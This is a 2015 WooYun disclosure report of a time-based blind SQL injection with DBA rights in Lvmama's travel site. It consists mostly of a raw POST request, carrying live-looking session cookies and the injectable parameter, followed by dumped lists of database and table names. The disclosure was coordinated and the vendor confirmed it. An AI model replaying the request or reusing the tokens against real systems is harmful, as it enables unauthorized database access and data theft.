当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148709

漏洞标题:驴妈妈旅游网主站SQL注入漏洞(DBA权限/时间盲注)

相关厂商:驴妈妈旅游网

漏洞作者: Xmyth_Xi2oMin9

提交时间:2015-10-22 22:02

修复时间:2015-12-07 10:08

公开时间:2015-12-07 10:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

我有一只小毛驴 我从来也不骑

详细说明:

1.png


POST /zt/promo/tiyan/?action=ajaxCheckMobile HTTP/1.1
Host: www.lvmama.com
Proxy-Connection: keep-alive
Content-Length: 27
Accept: */*
Origin: http://www.lvmama.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.lvmama.com/zt/promo/tiyan/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: uid=wKgKcFYoqTOvWkHYA3IUAg==; JSESSIONID=7D9FB3B20729F4A7D63BACA524B8C2D7; lvsessionid=77cdc52b-bbb1-4078-a9ee-c846857de9ce_19244332; ip_from_place_id=1; 
ip_from_place_name=""; ip_area_location=BJ; ip_location=114.252.84.34; ip_province_place_id=110000; ip_city_place_id=110000; ip_city_name=%E5%8C%97%E4%BA%AC; cmTPSet=Y; 
CoreID6=26730210502814455055673&ci=90409730; CASTGC=TGC-4921-Im1Xet49C2p2Sqim9PUMnXsoCliDwoxdrf32vFfQE2emB6cuNd; unUserName=mtestqingyouawlk; 
LSTA=792dda8547d49ad39f58801a348ac4a5; UN=mtestqingyouawlk%5E%21%5E4028b25b5024472e01502b7213020a7b; Rvyz72RO3yiChuCn=pqgqxfQmNx9c%2F0Yno%2Fe8a5arc2IL6Ob58ZNWq%2B9lLBaZ
%2F2YuMZ9%2F6zCLVoK6DjCkqo7bKb7OYP9tarloBj7m4BLf3TGzNiwNUZfhF1jqowxuFs9nrE%2FiIBAifqCiQ9oBI69L82ZR405tfu%2BjdCglHdvvoPMO977i7YiapmUiAM0VHky26gsEP6XKn7S0ERXHBvKEoxFYFZoIv
%2BXDNjNBrehw%2F1734kME%2Brg2sH4IF2zioRtX348B%2FQv4h6H%2FBipHImrTUnGgqLYQ1OJg%2FDMME6dp1BHibzwzbaTKSEskNM7LBPhKGiw9CGTnRvGp3JBzs70yScABm7NqxkfDO9KDBqSc
%2F4%2FVdWQZ3o6EzCZWZ3mmCDULs00TFBiaM%2BYy9G1NAiTdT75cUZfu3P2hSCYN%2Bo5IiQBkGt7cNUgyeIPu0fYTNnHzcQTxjACGZ%2FZQB03oj73JSohT7kEJbAIsW8B2xQ%3D
%3De7666be56e679c9b8dc871b127172c86aa7d6a4b; jXVJUTNgMEfp6rEr=x4C1i4MC%2BcO%2FQGxRmML7WkGYPGOS6e47%2Fy
%2FLfo2di3FkRS0EtCOb6PP582MjxzpjiTLv0WvEcfoXKVvHIaqYDHXaor4WuYcG8MswKnyyuNQ066v%2BXmd34AeZB%2B%2FQhTwKeAIaO8RwfOqdXK3oElH1Zy6aOJ
%2BNGrpKru0pmV3RABWkmwhsKWklbeIOJoA9CwJBd0n5rgvB2SsoxjIuVi0Ejdy1Vtnk5IuH7QhK5eMW4W%2B6TLoLUurF7O
%2BIuPzWctnF4pBwd05NiMC2cmoxaTlAwPT4BGXnYZitDtV5MUWxffVxBULd74nw1hhOYcMLppb0dvsPh4l45EKFLJTrmdNV66KqNntlOopUT5zX1Ygqag27wvWrLJeHSAlwPwK%2BKoqzjtsmQ0qFT8aoCZzPW4V6BWC%2BKK
%2FbaSQ6T8yWGlbfj%2F%2FhsUo4AaPaKczFlfooJ6RgxPCpjH53mxDvPDA9j3zyzA%3D%3De53ff81bda77409744ed2b55b88ea310c530ee39; __xsptplus443=443.2.1445508536.1445508613.3%234%7C%7C%7C%7C
%7C%23%23BRdhnsZ84BUthos4CDqxRNnCZtzoV45B%23; MY_SPACE_READ_IS_TRUE_4028b25b5024472e01502b7213020a7b=true; orderFromChannel=bing; bqeRoYZ7gjxuUl7T=OwvnYXLUjsh%2Fz
%2BmwW0cBfGraAT7LDwOE79OvBV0QMw%2BpLM07PJ06ts9m9MvwWVdjiJ2AqrK4V9V1GGoUsMcjWfUYxst0E5iTzJl0o3csBYdKnsw6HSZubOlmru3vwWLqnfx5rPofwtM8rcgFhbLZPToa0Dl55EMKbMR7Ifeg0gNjFyOKIg8Us
%2BR7PPganxwvus7s6zL1lDV7b09gNntHbau022SQwQnukfI74ORuo%2BFhDNtVBrN5vHWDqSMX%2FrAdil7AG8ptGE6i9NMUivbKyZEHFbrgSuMfWMXSNjN8MFNMcbRMt2gwCZ7pyCod0uHN5ASTOQl%2BT8xmH
%2BT6go9p19B6s1J%2FqCZ4plsAf4VVIB6iCx%2FSokquorsFL6yEuwXCEPAiV7Wl6Eliwht003L1s9Ht3eKhu78uQC%2Bt5PxMM%2BuQ0%2FOwtM76K2ZBTcWa1%2BEfL89PyAb5qfFzSwo4lXRMkw%3D
%3D2e2d34ca91ffed54a34fe9368ad96cbae4525505; 90409730_clogin=v=1&l=1445510761&e=1445512692709; 90409730_clogin=v=1&l=1445510761&e=1445512696872; 
__utma=30114658.1836242761.1445505611.1445508536.1445510762.3; __utmb=30114658.8.10.1445510762; __utmc=30114658; __utmz=30114658.1445505611.1.1.utmcsr=(direct)|utmccn=
(direct)|utmcmd=(none); bfd_s=30114658.6828180.1445505611373; tmc=7.30114658.28977164.1445510762118.1445510881016.1445510899060; 
tma=30114658.52204097.1445505611374.1445505611374.1445505611374.1; tmd=25.30114658.52204097.1445505611374.; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1445505610; 
Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1445510899; bfd_g=8d94ecf4bbcd473800002bfa00004d115628aa4b
undefined&value=13800138000

漏洞证明:

权限:

1.png


available databases [18]:
[*] info
[*] infonews
[*] information_schema
[*] lmm_core
[*] lmm_customization
[*] lmm_guide
[*] lmm_logs
[*] lmm_lvyou
[*] lmm_message
[*] lmm_module
[*] lmm_subject
[*] lmm_subjects2
[*] lmm_weather
[*] lvmamabus
[*] minisite
[*] mysql
[*] others
[*] post_robot


1.png


Database: lmm_lvyou
[116 tables]
+------------------------------------------+
| biz_dest_relation                        |
| ly_activity                              |
| ly_activity_block                        |
| ly_address                               |
| ly_biz_dest                              |
| ly_biz_district                          |
| ly_bonus                                 |
| ly_bonus_set                             |
| ly_category                              |
| ly_com_coordinate                        |
| ly_communication                         |
| ly_consulate                             |
| ly_consulate_info                        |
| ly_contact                               |
| ly_coordinate                            |
| ly_cost                                  |
| ly_data                                  |
| ly_dest                                  |
| ly_dest_bak                              |
| ly_dest_org_down_week_view               |
| ly_dest_payment                          |
| ly_dest_type                             |
| ly_destination                           |
| ly_destination_20150305bak               |
| ly_destination_org_view                  |
| ly_destination_subject_relation_new_view |
| ly_diary                                 |
| ly_diary_150202bak                       |
| ly_diary_bak4                            |
| ly_diary_temp                            |
| ly_district                              |
| ly_district_type                         |
| ly_elite_image                           |
| ly_facility                              |
| ly_feature                               |
| ly_festival                              |
| ly_food                                  |
| ly_food_bak                              |
| ly_food_dest                             |
| ly_food_dest_subject_relation_view       |
| ly_food_recommend                        |
| ly_food_type                             |
| ly_goods                                 |
| ly_goods_bak                             |
| ly_goods_dest                            |
| ly_goods_recommend                       |
| ly_hot_user                              |
| ly_monthrec                              |
| ly_must                                  |
| ly_payment                               |
| ly_payment_dest                          |
| ly_payment_type                          |
| ly_pk_count                              |
| ly_play_type                             |
| ly_product_set                           |
| ly_recommend                             |
| ly_recommend_block                       |
| ly_restaurant                            |
| ly_room_type                             |
| ly_s_picture                             |
| ly_s_picture_bak1                        |
| ly_s_picture_bak4                        |
| ly_s_picture_view                        |
| ly_s_text                                |
| ly_scenic_viewspot                       |
| ly_segment                               |
| ly_segment_150202bak                     |
| ly_segment_bak4                          |
| ly_segment_temp                          |
| ly_segment_temp2                         |
| ly_segment_temp3                         |
| ly_stack                                 |
| ly_stack_bak                             |
| ly_stay                                  |
| ly_stay_dest                             |
| ly_stay_hotel                            |
| ly_stay_type                             |
| ly_subject                               |
| ly_suggest_time                          |
| ly_tag                                   |
| ly_tag_item                              |
| ly_tdk                                   |
| ly_ticket                                |
| ly_time                                  |
| ly_trace                                 |
| ly_trace_150202bak                       |
| ly_trace_bak4                            |
| ly_trace_temp                            |
| ly_transportation                        |
| ly_travel                                |
| ly_travel_day                            |
| ly_travel_day_dest                       |
| ly_trip                                  |
| ly_trip_150202bak                        |
| ly_trip_bak                              |
| ly_trip_bak4                             |
| ly_trip_dest                             |
| ly_trip_score_group_view                 |
| ly_trip_score_view                       |
| ly_trip_statistics                       |
| ly_trip_temp                             |
| ly_trip_temp2                            |
| ly_trip_temp3                            |
| ly_visa                                  |
| ly_visa_consulate                        |
| ly_visa_consulate_info                   |
| ly_xls_day                               |
| ly_xls_pictrue                           |
| ly_xls_pictrue_bak0413                   |
| ly_xls_trace                             |
| ly_xls_trip                              |
| ly_xls_user                              |
| v_ly_bonus                               |
| v_ly_diary                               |
| v_ly_trip                                |
| v_ly_trip2                               |
+------------------------------------------+

修复方案:

修复吧 被脱裤子就不好了 挖的我好辛苦

版权声明:转载请注明来源 Xmyth_Xi2oMin9@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-23 10:07

厂商回复:

thx

最新状态:

暂无